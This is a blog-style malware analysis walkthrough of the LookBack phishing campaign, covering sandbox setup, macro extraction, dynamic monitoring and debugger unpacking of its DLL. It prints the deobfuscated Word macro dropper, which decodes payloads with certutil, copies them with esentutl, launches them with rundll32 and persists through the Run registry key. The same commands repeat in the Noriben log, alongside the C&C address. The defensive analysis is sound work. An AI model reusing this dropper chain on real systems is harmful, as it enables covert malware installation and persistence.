Taking a closer look at the LookBack Malware Campaign

If you follow my posts on LinkedIn, you might recall an article I shared about a week or two ago about a new malware campaign that was uncovered, targeting ICS companies in the US utilities industry. If you missed the post or want to reread the article, here is the link: https://arstechnica-com.cdn.ampproject.org/c/s/arstechnica.com/information-technology/2019/08/new-advanced-malware-possibly-nation-sponsored-is-targeting-us-utilities/?amp=1.

In the article they attribute the malware campaign to a Chinese Advanced Persistent Threat (APT) group, APT10 or "MenuPass". The whole process behind classifying and attributing the malware campaign in and by itself would make a fascinating blogpost, however I would like to use our time to have a closer look at the infection process behind the LookBack campaign. How exactly does an email with an attached Microsoft Word document infect your system and what does the malware do once it's executed?

A word of caution upfront, we will be playing with live, malicious malware that has somebody or something listening on the receiver's end. If you're going to follow along, make sure you have a properly setup malware analysis lab. I might do a separate blogpost on that in the future, for now, take a look at the following writeup on creating a virtual malware
analysis lab https://www.haloforensics.com/?p=48.

For the task at hand, I setup a small virtual lab within VMware Workstation, consisting of an isolated virtual network (using a Host-Only virtual NIC where you do not assign a NIC to the host), an up-to-date copy of REMnux (https://remnux.org/) and a highly customized Windows 8 Virtual machine to run the malware on (called the escape goat or malware machine). Why windows 8? Because I built that to perfection a few years ago and I haven't gotten around doing the work on a Windows 10 VM yet.

Because pictures always help drive the message home, here is a depiction of the Virtual Lab I'll be using:

 

 

Our sacrificial lamb, the windows 8 machine where we will run the malware, is configured to be able to reach the internet via the REMnux machine only (using it as the default gateway). This allows any network traffic to be sniffed and recorded by the REMnux VM on its way out.

Let's get cracking.

The above-mentioned article doesn't go into much technical details about the malware itself as it is written more as a cautionary tail. It does however provide a link to the malware analysis writeup done by Proofpoint, to be found at: https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks.
The writeup is a pretty thorough guide describing the infection process and details about the malware itself. I will be following Proofpoint's methodology of analysis but will make some detours and deep dives at certain stages to look at things from another angle and see if we can find more details about the ultimate purpose of the campaign and the malware.

As explained by both articles, the malware campaign uses a spear phishing email as attack. The figure below shows a screenshot of an email as received by one of the targeted individuals. The email is tailored to trick the receiving engineers into opening the attached Word document by convincing them that they failed their certification exam. Even though we are all groomed and warned not to open email attachments from unknown source, (spear) phishing emails remain a very effective way to deliver a malicious payload, especially when
professionally crafted for the intended audience.

 

 

Email Screenshot, Created by Proofpoint

As a side note, since I didn't receive this email myself, I had to find some other way to get the email, the word document or the malware files for analysis. For the obvious reasons Proofpoint did not include any links in their article and I had to resort to some other means. This turned out to be harder than I expected. I started by looking for clues in the articles I read on the malware campaign. Proofpoint conveniently included Indicators of Compromise (IOC) at the end of the article:

 

 

I grabbed the SHA256 hash for the word document (a2d41af0b4f8f0fd950fd4ac164cb2c836fd3c679688b4db75e85ffabfc20d94) and went to https://www.virustotal.com to see if the file had been analyzed before. And sure enough, VirusTotal came up with the following result when looking up the hash value:

 

 

However, I didn't see any obvious way to download a sample from them though. Apparently, you must be vetted, processed and approved before you will be allowed to download samples. With that, if any of you can point out how to start that process, please respond with some advice. Next stop, https://www.hybrid-analysis.com/, with a similar result, the site didn't have the word document analyzed but did have a entry for the malicious GUP.EXE hash. Hybrid Analysis also requires you to be vetted and approved before you can download the sample, however their process of doing this is much more straightforward. I started the vetting process with them and moved on.

I finally managed to strike gold a https://app.any.run/, a fantastic online resource for malware analysis. It allows you to run the whole process on their systems. If you haven't tried them, you should. Anyway, after finding the SHA256 hash in their public submissions records, the service allowed me to download "result notice.doc" Word document that is attached to the phishing email:

 

 

Now the real fun can start.

I copied the password protected zip file with the word document onto the Windows 8 malware VM, safe to extract and look at. Seeing as this is a Word document, I instinctively start looking for OLE (Object Linking and Embedding) information. My go to tools for OLE exploration are the python "oletools" from http://decalage.info/python/oletools. They can easily be installed by running "pip install oletools" and give you the means to parse OLE and OpenXML files such as MS Office documents. For example, running "olemeta" on the malicious word document shows us the following information:

 

 

We can see details such as creation time, last modified date and time and the author here. Hmm, a failure notice that contains a single word….

Let's enumerate the types of objects in the word document to see if anything stands out. We use a tool developed by Didier Stevens "oledump.py" (https://blog.didierstevens.com/programs/oledump-py/) for the task:

 

 

Right away we can see that the Word document contains a macro (indicated by the 'M' in the screenshot). If finding Macro's in office documents doesn't alarm you by itself, the fact that 98% of the document is, in fact dedicated to the macro, should. This is highly suspicious to say the least. Let's extract the Macro content from the word document and see what it is all about.

We could use oledump.py for the task but I prefer to run "olevba" from the oletools set as it does a cleaner job. So, let's throw that command at the word document. I will pipe the output into a text file as the sheer amount of tool output is too large for review in the terminal:

olevba.exe 'C:\Users\pac\Desktop\result notice.doc' > C:\Users\pac\workdir\temp\vba.txt

Wow, the olevba tool output generated a 5Mb text file! If we look at the output, we see large sections where variables are initialized to blobs of seemingly random text.

 

 

As can be seen in the screenshot above, after declaration of the variable, the variable is stored as a txt file. After the variable declarations we see the body of macro, shown in the screenshot below:

 

 

The authors of the macro are "obfuscating" the macro's intent by splitting up the command into chunks. If we "de-obfuscate" the macro it looks like this:

Sub nRun()
Set o = CreateObject("WScript.Shell")
Set fso1 = CreateObject("Scripting.FileSystemObject")

n = "pense1.txt"
n2 = "pense2.txt"
n3 = "sodom.txt"
n4 = "pense3.txt"

Z = "$tmp$\pense1.txt"
z2 = "$tmp$\pense2.txt"
z3 = "$tmp$\sodom.txt"
z4 = "$tmp$\pense3.txt"

o.Run "cmd /c type $tmp$\pense3.txt >> $tmp$\pense2.txt, 0, True
o.Run "cmd /c copy %windir%\system32\certutil.exe %tmp%tcm.tmp", 0, True

o.Run "cmd /c %tmp%tcm.tmp -decode $tmp$\pense1.txt %tmp%GUP.txt", 0, True
o.Run "cmd /c %tmp%tcm.tmp -decode $tmp$\pense2.txt %tmp%GUP2.txt", 0, True
o.Run "cmd /c %tmp%tcm.tmp -decode $tmp$\sodom.txt %tmp%sodom.txt", 0, True

o.Run "esentutl.exe /y %tmp%GUP.txt /d C:\Users\Public\GUP.exe /o", 0, True
o.Run "esentutl.exe /y %tmp%GUP2.txt /d C:\Users\Public\libcurl.dll /o", 0, True
o.Run "esentutl.exe /y %tmp%sodom.txt /d C:\Users\Public\sodom.txt /o", 0, True

o.Run "C:\Users\Public\GUP.exe", 0, False
o.Run "rundll32.exe C:\Users\Public\libcurl.dll,#52", 0, False

o.Run "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d ""rundll32.exe C:\Users\Public\libcurl.dll,#52""", 0, True
o.Run "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d ""C:\Users\Public\GUP.exe""", 0, True
End Sub

Private Sub Document_Open()
AddDsRun
OasbjRdun
n1Run
nRun
End Sub

 

In short, the macro starts at Document_Open() when we, well, open the document. The first three commands are the variable declaration and text file creation routines. After that is completed, nRun is called which first copies the text files to the $tmp$ folder (C:\Users\pac\AppData\Local\Temp), along with a copy of certutil.exe from system32. Certutil.exe is used to decode the text files, which by examining the way it is called on the online documentation for certutil.exe, are base64 encoded. After decoding with certutil.exe, the macro uses Windows native esentutl.exe to decrypt the files into gup.exe, libcurl.dll and Sodom.txt and stores those files in the c:\users\public folder. Now the script goes on the start the newly created gup.exe and libcurl.dll (notice exported function 52 is called). The macro finishes its task by setting up persistence for the executable files by manipulating the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key.

The rest of the olevba tool output shows the many suspicious indications the tool found while parsing the macro content:

 

 

Now that we have a pretty good understanding of what the Word document will do once we open it, it is time to launch and observe the malware in action. Before we do this though, we should prepare the environment:

First, we need to configure the REMnux VM to be the gateway out of the isolated VM network. For this purpose, the REMnux VM is equipped with 2 virtual network interfaces eth0 and eth1. Eth0 is attached to the isolated network and eth1 is connected to the internet. The following bash script will configure the system to forward and NAT any packets send to the eth0 interface:

 

"ip-forwarding.sh"

echo '1' > /proc/sys/net/ipv4/ip_forward
sudo iptables -A FORWARD -o eth1 -i eth0 -s 172.20.20.0/24 -m conntrack --ctstate NEW -j ACCEPT
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -F POSTROUTING
sudo iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE

 

The windows 8 'malware' VM will need to be configured to have the address of eth0 on the REMnux machine as it's default gateway. As DNS server we will use 8.8.8.8.

 

 

Next, we will run Wireshark for full packet capture during the analysis process as well as launch a python script that catches DNS queries by sniffing eth0 traffic. The following is the listing of the dns-sniffer.py script I used:

 

! /usr/bin/python

import sys
from scapy.all import *

try:
print( "Discovered interfaces: " + str(IFACES.show()) )
interface = input("[] Interface to use for sniffing: ")
except KeyboardInterrupt:
print("[] Keyboard interrupt detected…")
print("[*] Shutting down…")
sys.exit(1)

def sniffcallback(pkt):
if IP in pkt:
ip_src = pkt[IP].src
ip_dst = pkt[IP].dst
if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:
print(str(ip_src)+" -> "+str(ip_dst)+" : "+"{"+str(pkt.getlayer(DNS).qd.qname)+"}" )


sniff(iface=interface, filter="port 53", prn=sniffcallback, store=0)
print("[] Keyboard interrupt detected…") print("[] Shutting down…")

 

When you run the python script it will start displaying all the DNS queries the REMnux VM sees on the isolated VM network (the ones send from our malware machine). You can see this in Wireshark as well, I find it convenient to have this script running on the side.

 

 

On the Windows 8 VM, before executing the malicious word document, I am going to run the Noriben python script. From https://github.com/Rurik/Noriben: "Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run an application, hit a keypress, and get a simple text report of the sample's activities". This script will basically log any interesting actions the malware performs via the Systinternals Procmon tool and displays it in an easy to read output. Let's start the script:

 

PS C:\Users\pac\workdir\python\Noriben> dir

Directory: C:\Users\pac\workdir\python\Noriben
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/20/2017 3:57 PM Sample
-a--- 10/20/2017 3:38 PM 59079 Noriben.py
-a--- 10/20/2017 3:38 PM 3410 NoribenRead.py
-a--- 10/20/2017 3:38 PM 1835 NoribenSandbox.bat
-a--- 10/20/2017 3:38 PM 18409 NoribenSandbox.py
-a--- 10/20/2017 3:38 PM 2424 NoribenSandbox.sh
-a--- 10/20/2017 3:38 PM 205 postexec.txt
-a--- 10/20/2017 3:38 PM 21316 ProcmonConfiguration.pm
-a--- 10/20/2017 3:38 PM 20746 ProcmonConfiguration_ex
-a--- 10/20/2017 3:38 PM 20068 ProcmonConfiguration_hi
-a--- 10/20/2017 3:38 PM 18214 ProcmonConfiguration_me
-a--- 10/20/2017 3:38 PM 6846 README.md

PS C:\Users\pac\workdir\python\Noriben> python .\Noriben.py

--===[ Noriben v1.7.2
--===[ @bbaskin
[] Using filter file: ProcmonConfiguration.PMC [+] Features: (Debug: False YARA: False VirusTotal: False) [] Using procmon EXE: c:\tools\procmon.exe
[] Procmon session saved to: Noriben_16_Aug_19__12_59_40_253000.pml [] Launching Procmon …
[] Procmon is running. Run your executable now. [] When runtime is complete, press CTRL+C to stop logging.

 

Now we have everything in place to record the actions the malware might take. Let's open the malicious word document and see what happens. At first, we are presented with a "allow macros to continue" screen:

 

 

Needless to say at this point that you should never ever allow a macro to run unless you are absolutely certain of the content and origin of the office document. Certainly not for a file someone send via email! But let's be foolish and for this exercise allow the macro to run. I clicked "enable content" and after about 30 seconds of hourglass cursor and nothing else obvious going on, I now see this screen:

 

 

Except for the missing security warning, not much has changed on the malware machine, at least nothing obvious. On the REMnux VM we see a ton of traffic from the malware machine to the following IP address: 103.253.41[.]45, which was indicated by the articles to be the Command and Control (C&C) server for the campaign.

 

 

Noteworthy to mention is that the IP address seems to be hard-wired into the malware are there isn't a DNS request that resulted in the IP address before communications started. This will break the communication to the C&C if the server is taken down as well as make for a very effective Indicator of Compromise (IOC).

If we lookup the C&C IP address on VirusTotal (https://www.virustotal.com/gui/ip-address/103.253.41.45/details) we find an association with the LoopBack malware. We knew this upfront but in a regular malware analysis sessions this is valuable information that should be gathered.

Finally, notice how the malware uses a POST request to http://103.253.41[.]45/status.gif?r=xxxxxxx to communicate with the C&C server. The xxxxxxx part of the URL is an increasing number, likely to keep track of requests.

After letting the malware run for a while (I waited 15 minutes) we will close the Noriben script (with CTRL+C) and have it generate the report with findings:

 

 

The full contents of the Noriben report are listed at the end of this article. In summary though, the word document (WINWORD.exe) is witnessed creating some text files and copying a windows executable (certutl.exe) into the user's temp folder, then these text files are decoded into executable files (GUP.exe and libcurl.dll) with esentutl.exe. Finally, these newly created executable files are started and made persistent via the registry RUN key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run).

Let's take a closer look at the files that were created. Using a python script, vt.py (install via pip install vt) we can, among many more actions, upload executables to VirusTotal from the command prompt:

 

PS C:\Users\Public> vt -f .\GUP.exe -v

Calculating hash for: .\GUP.exe
Scanned on :
2019-08-16 09:45:51
Detections:
39/66 Positives/Total
Results for MD5 : 6421d130295cc111af4b5a35c8fed3ab
Results for SHA1 : a7cc6118fc6dfa88cde869e5f98af4c58cf35c5a
Results for SHA256 : 0f951b7a68e9c0984a0bee3c44e2d64aeac6320bbc2ba2a0f1420893550cf441

Verbose VirusTotal Information Output:
+-------------------+-----------+----------------------------------+----------------------+--------------+
| Vendor name | Detected | Result | Version | Last Update |
+===================+===========+==================================+======================+==============+
| ALYac | True | Trojan.GenericKD.41521765 | 1.1.1.5 | 20190816 |

 

OK, those results definitely confirm the maliciousness of the file. Something that stands out though is that the executable has a different sha256 HASH value then what was identified in the proofpoint report. We will see why in a bit.

Next, lets inspect GUP.exe in pestudio. Pestudio (https://www.winitor.com/) is a utility that can be used to inspect PE files for malicious characteristics. I literally do not leave home without it. Any system I have has this command under the right-mouse context menu. It allows me to check anything I do not trust with a single click. Pestudio performs a large variety of checks on a PE file and allows us to see details about the nature of the executable:

 

 

Pestudio flags the gup.exe file on several suspicious trademarks:

 

 

Looking at the file details tab in the screenshot above, one thing that stands out immediately is the signature indicating this is a UPX compressed file:

 

 

Verified by the entry-point listing of the file:

 

 

So, what does UPX compression mean. Well, in order to make an executable file smaller, a developer can run a UPX compression tool on the file to shrink the file much like a zip file is shrunk. This saves some space for the file on disk. However, before the file can be executed though it will have to decompress itself, this is what we see indications of in the pestudio output.

A side-effect of compressing an executable is that resources like strings and import declarations are getting compressed as well, effectively obfuscating them from prying eyes. As mentioned, UPX compression is used for legitimate purposes, however the presence should make a malware analyst very suspicious. To see the effect of UPX, let's take a look at the imports of GUP.exe with the PEview.exe utility (https://www.aldeid.com/wiki/PEView):

 

 

Not much to see here. Just enough functionality to UPX decompress the file. We can use a standalone version of the UPX tool (https://upx.github.io/) to decompress our GUP.exe file:

 

PS C:\Users\Public> upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94w Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-o FILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io

PS C:\Users\Public> upx -d .\GUP.exe -o GUP-d.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94w Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017

File size Ratio Format Name
-------------------- ------ ----------- -----------
102912 <- 50688 49.25% win32/pe GUP-d.exe

Unpacked 1 file.

 

Now when we look at the decompressed executable (GUP-d.exe), we can see a whole lot more details:

 

 

I ran the same decompression on the libcurl.dll file as it also showed UPX characteristics, and created libcurl-d.dll.

As a side note, after decompression the sha256 HASH values for the resulting files are now identical to the IOCs reported by proofpoint:

 

PS C:\Users\Public> sha256deep64.exe .\GUP-d.exe
368ae77c829c29db2c3e719ce423104db86165422391403ad0483944aa287c20 C:\Users\Public\GUP-d.exe

PS C:\Users\Public> sha256deep64.exe .\libcurl-d.dll
cf57eb331b09cb2bc8992ea253d301161f1fa38583cba0733ea6dc2da2bdf740 C:\Users\Public\libcurl-d.dll

 

When we run Pestudio on the decompressed libcurl-d.dll file, it shows the exports for the dll file, with export 52 highlighted:

 

 

Recall from the macro analysis and the output of the Noriben script that on launch, exported function 52 is of importance. We will use this information later on in our dynamic analysis of the dll.

 

 

It is time to switch gears a bit. Let's look at the executable files that are running in memory after infection. For example, the GUP.exe (this is the running copy, started by WINWORD.exe, not the decompressed one in the public folder) can be examined with Sysinternal's process explorer:

 

 

Details like location, parent ID and startup type can be discovered via the properties panel of Process Explorer. We already know about these details from the static analysis we did before but it's good to see them verified here. The TCP/IP tab viewed in the screenshot above however shows a new detail to explore. The GUP.exe has created TCP/IP sockets. There is a listening socket on port 9090 (with established connection instance) and a socket connected to the C&C IP address we discovered earlier. Combining what we read in the articles about the LookBack malware and seeing this behavior, backed by some debugging exercises performed on the decompressed executable I am concluding that GUP.exe is mainly a 'man in the middle' or Proxy utility to broker communications to and from the C&C server. The rest of the article will be concentrating on the libcurl.dll file.

The libcurl.dll file is loaded via rundll32.exe and can be found by using the search function of Process Explorer, looking for the file:

 

 

The libcurl.dll TCP/IP properties tab shows it is connected to our GUP.exe process via port 9090 (both sides show the same IP address and TCP port combination):

 

 

What exactly is the dll doing? Looking at the Wireshark packet capture a bit closer reveals a beacon type style communication pattern to the C&C server, regular interval communications but the packet contents are either gibberish or encrypted. To see what the capabilities of the DLL are, we will have to reverse engineer it. I will be using an old-time favorite utility for many a reverse engineer, the OllyDbg debugger (http://www.ollydbg.de/). OllyDbg is an extremely handy tool, to this date it never ceases to amaze me how capable it is. I am using an optimized version of the debugger, kindly provided by R4ndom (https://tuts4you.com/e107_plugins/download/download.php?list.97
Tutorial 3 download). R4ndom's version of OllyDbg contains bug fixes and plugins that help thwart any anti reversing tricks the malware might perform Let's load the dll and call the suspicious export:

NOTE: If you are going to follow along with the analysis process, keep in mind that your memory locations, pointers and addresses will likely be different than the ones shown in the following screenshots. This is because of the intentional variance in mapping code into memory (ASLR) and Windows memory management in general.

Start OllyDbg, open the libcurl-d.dll file and press 'run (F9)' to initialize the dll. Next go to the debug menu and select: "Call dll export". The following screen will popup that allows you to specify what exported function to call:

 

 

Choose the curl_share_init exported function and click Call, then close this popup screen. The OllyDbg CPU screen will now be paused at the curl_share_init function's main routine (my screenshot contains comments and breakpoints from the ongoing analysis):

 

 

curl_share_init - Main routine

The assembly code shown in the screenshot above is the main routine for the exported curl_share_init function. The routine starts with identifying the start of the memory section it is running in via the Windows VirtualQuery API call. Next, it retrieves the memory mapped module name via GetModuleFileName. It then allocates a 0x4f0 (1264) byte large section in memory for later use (we will call the section MEM1 for convenience).

Next, curl_share_init calls, what I have called the "DecryptCode" function:

 

 

The DecryptCode function fills MEM1 with data from the resource section of the dll file. It then goes through the process of decrypting the copied data, into assembly instructions. You see this decryption process in progress in the screenshot below. The highlighted section on the left represents the decoded data, the area below it is not decoded yet.

 

 

Once DecrytCode has copied and decoded all data into instructions for MEM1, program execution returns to the main routine of curl_share_init. Here, the program sets an offset into the decoded MEM1 section and directs program execution to that location:

 

 

curl_share_init - Main routine

The screenshot below shows the assembly code where program execution is directed to:

 

 

MEM1 - Contents

Let's see what this additional code that gets created on the fly, does.

The first thing we see happen here, is the program retrieving the addresses of kernel32.dll functions LoadLibrary and GetProcAddress from stack memory (looking at previous screenshots, we see the main routine of curl_share_init put them there). After retrieving the location of the LoadLibrary function, the program uses it to load Kernel32.dll into its own memory space.

 

 

MEM1 - Main routine

With Kernel32.dll loaded into its memory space, the program now starts mapping a predefined list of functions and builds a function list on the stack:

 

 

After building the function list, program execution is directed to the 001F0370 subroutine. In this subroutine the mapped functions are used to find a resource in the libcurl-d.dll memory space. That resource is extracted, some memory is allocated, and the resource content copied into the new memory location (calling this one MEM2). The screenshot below shows the listing for this functionality. The comments were derived from cross referencing the code to the function list and adding arguments from the MSDN documentation of the called API function:

 

 

The below screenshot shows the content of newly created memory section MEM2 (likely still encrypted):

 

 

MEM2 - Content

With memory section MEM2 created the code in MEM1 calls the subroutine 001F0000, most likely to decrypt the data in MEM2:

 

As it turns out, subroutine 001F0000 does exactly that, it decrypts the data of MEM2 into assembly code. The figure above shows the second stage of the decryption process, revealing the code in the allocated memory (shown to the right of the screenshot). I renamed subroutine 001F0000 to DecryptAllocatedMemory.

After the decryption process we return to the main routine of MEM1. Here we push a pointer to the decrypted memory section MEM2 onto the stack along with a pointer to the function list and call the subroutine at 001F0140. This subroutine seems to create a new memory section (MEM3) and copy (parts of) the content of MEM2 into the newly created memory section. I renamed this subroutine CopyMem2ToMem3. Finally, MEM1's main routine deletes the MEM2 memory section with the VirtualFree API call:

 

 

MEM1 - Main Routine

If at this point you are confused to what all is going on, don't worry, that is the intent of the malware author. The harder they make it to reverse engineer the code, the longer it will remain a viable threat. Also, as we will see in a minute, the harder they make analysis, the more protection the core functionality or the intent of the malware will have against discovery.

So, this is where we are right now. The exported function curl_share_init created a memory section (MEM1). Next, the main routine of MEM1 created a memory section MEM3, which at this time is fully decoded and mapped. MEM1's main routine now continues by calling the subroutine at 001F01C0. This subroutine maps kernel32.dll and w2_32.dll into MEM3 address space along with certain functions within Kernel32.dll and w2_32.dll:

 

 

MEM1 - 001F01C0 Subroutine

I renamed this subroutine to CopyLibraryFunctionsToMem3. Next, after returning from the subroutine, MEM1's main routine directs program execution to MEM3, offset 0x25D0 (MEM3 is mapped at 0x001E0000):

 

 

MEM1 - Main Routine

As I did with every newly created memory section, I dumped MEM3 do disk as dec_module-3.bin.

 

 

Looking at the dumped binary file with Peview revealed that this memory module is actually a full-fledged PE file, a dll to be precise:

 

 

It is showing some interesting export names:

 

 

And if we look at the entry point address for the dll (for the DllEntryPoint() function address):

 

 

We see the 00025D0 offset that we witnessed earlier, the offset in MEM3 that MEM1's main routine is diverting program execution to.

I don't know whether it's because my extracted memory module wasn't reconstructed properly, or if we truly did discover a new part of the LookBack malware campaign, but when I uploaded the extracted dll to VirusTotal it reported it had not seen the file before and had its AV scanners examine the file:

 

 

After analyzing was completed, as you can see in the screenshot above, only a few AV engines found anything malicious within the file.

I will conclude the analysis for now by showing the handover from MEM1 (libcurl-d.dll) to MEM3 (mem3.dll or Sodom.dll).

After commenting the appropriate parts of the MEM1 main routine it now looks like this:

 

 

In the screenshot above, we see that MEM1 first initializes the dll with the call at 001F03F8 (DllEntryPoint) and then calls the SodomBodyLoad export function at the highlighted instruction.

The SodomBodyLoad routine will create a thread and then wait for that thread to finish as shown in the screenshot below:

 

 

mem3.dll (Sodom.dll) - SodomBodyLoad function

Looking at the MSDN documentation for CreateThread, the API function will create a thread that runs the code indicated by the 3rd argument "PUSH 1E1A70" when it is called. PUSH 1E1A70 results in 001E1A70 when it is pushed onto the stack. The assembly code that starts at that location is shown in the screenshot below:

 

 

mem3.dll (Sodom.dll) - Thread function

At this point a new execution process (new thread) is created. OllyDbg has the newly created thread recorded as 00000B08:

 

 

The main task of libcurl.dll is done at this point. The malware will continue its activities via the mem3.dll (or Sodom.dll or whatever we want to call it). So, our analysis should continue with Sodom.dll. However, I am going to leave that for another blogpost as I feel we have spent enough time staring at assembly code for now. Expect to see a detailed analysis on the Sodom.dll in the near future. That should show us exactly what the malware's intentions are. Up to now we only seen the delivery, install and persistence part of the malware campaign. We know how LookBack is delivered, how it communicates to the C&C and how it begins its life. What we don't know is what it wants, what the ultimate purpose is. From the Proofpoint report we learned that they observed and detected Remote Access Trojan (RAT) functionality. Let's see how that remote access aspect works exactly, what it entails, and how that all looks in (assembly) code the next time we meet. Also, at this point the affiliation of LookBack to the ICS/OT space only seems to be the recipient of the initial phishing email. The people addressed in the phishing email are engineers for OT related companies. However, the delivered malware so far doesn't show any particular aspects as to be geared towards the ICS environment. This is however how most of these attacks work. Many companies will have their OT network segmented off from the IT network with only a few individuals having access to both networks. These individuals tend to be the engineers of a company so targeting them with malware that can provide a pivot point from the internet into the OT network a strategic move. In these cases the malware is not specifically aimed at the OT environment, but the campaign is.

Detailed analysis of Sodom.dll might show us some functionality that is specifically aimed at stealing ICS data or disrupting ICS processes or even finding particular ICS equipment. It might have some more layers of obfuscation that reveal functionality that only surfaces when the real target is in sight. Stay put and join me for the next phase of this fascinating journey.

 


Appendix Section:

 

Noriben report details:

Noriben report details:
-=] Sandbox Analysis Report generated by Noriben v1.7.2
-=] Developed by Brian Baskin: brian @@ thebaskins.com @bbaskin
-=] The latest release can be found at https://github.com/Rurik/Noriben
-=] Execution time: 699.63 seconds
-=] Processing time: 0.44 seconds
-=] Analysis time: 31.58 seconds

Processes Created:

[CreateProcess] schtasks.exe:2736 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 1812]
[CreateProcess] services.exe:560 > "%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" [Child PID: 3696]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\splwow64.exe 8192" [Child PID: 944]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c type %LocalAppData%\Temp\pense3.txt>>%LocalAppData%\Temp\pense2.txt" [Child PID: 3232]
[CreateProcess] cmd.exe:3232 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3712]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c copy %WinDir%\system32\certutil.exe %LocalAppData%\Temptcm.tmp" [Child PID: 3660]
[CreateProcess] cmd.exe:3660 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 2400]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c %LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense1.txt %LocalAppData%\TempGUP.txt" [Child PID: 3708]
[CreateProcess] cmd.exe:3708 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 2568]
[CreateProcess] cmd.exe:3708 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense1.txt %LocalAppData%\TempGUP.txt" [Child PID: 3444]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c %LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense2.txt %LocalAppData%\TempGUP2.txt" [Child PID: 1196]
[CreateProcess] cmd.exe:1196 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3528]
[CreateProcess] cmd.exe:1196 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\pense2.txt %LocalAppData%\TempGUP2.txt" [Child PID: 2072]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c %LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\sodom.txt %LocalAppData%\Tempsodom.txt" [Child PID: 684]
[CreateProcess] cmd.exe:684 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 256]
[CreateProcess] cmd.exe:684 > "%LocalAppData%\Temptcm.tmp -decode %LocalAppData%\Temp\sodom.txt %LocalAppData%\Tempsodom.txt" [Child PID: 2984]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\TempGUP.txt /d %Public%\GUP.exe /o" [Child PID: 1920]
[CreateProcess] esentutl.exe:1920 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3780]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\TempGUP2.txt /d %Public%\libcurl.dll /o" [Child PID: 3124]
[CreateProcess] esentutl.exe:3124 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3516]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\esentutl.exe /y %LocalAppData%\Tempsodom.txt /d %Public%\sodom.txt /o" [Child PID: 384]
[CreateProcess] esentutl.exe:384 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3196]
[CreateProcess] WINWORD.EXE:3252 > "%Public%\GUP.exe " [Child PID: 3980]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 2036]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 3420]
[CreateProcess] rundll32.exe:2036 > "%WinDir%\System32\rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 3548]
[CreateProcess] cmd.exe:3420 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 3224]
[CreateProcess] cmd.exe:3420 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlUpdate /f /d rundll32.exe %Public%\libcurl.dll,#52" [Child PID: 2488]
[CreateProcess] WINWORD.EXE:3252 > "%WinDir%\System32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d %Public%\GUP.exe" [Child PID: 4004]
[CreateProcess] cmd.exe:4004 > "\??\%WinDir%\system32\conhost.exe 0xffffffff" [Child PID: 356]
[CreateProcess] cmd.exe:4004 > "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurlInit /f /d %Public%\GUP.exe" [Child PID: 3976]

File Activity:

[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\WINWORD.EXE [SHA256: ed777b140a4d61c5090ee44cd1584ba0ac4aa37459ba546e44fdbaaf77495f07]
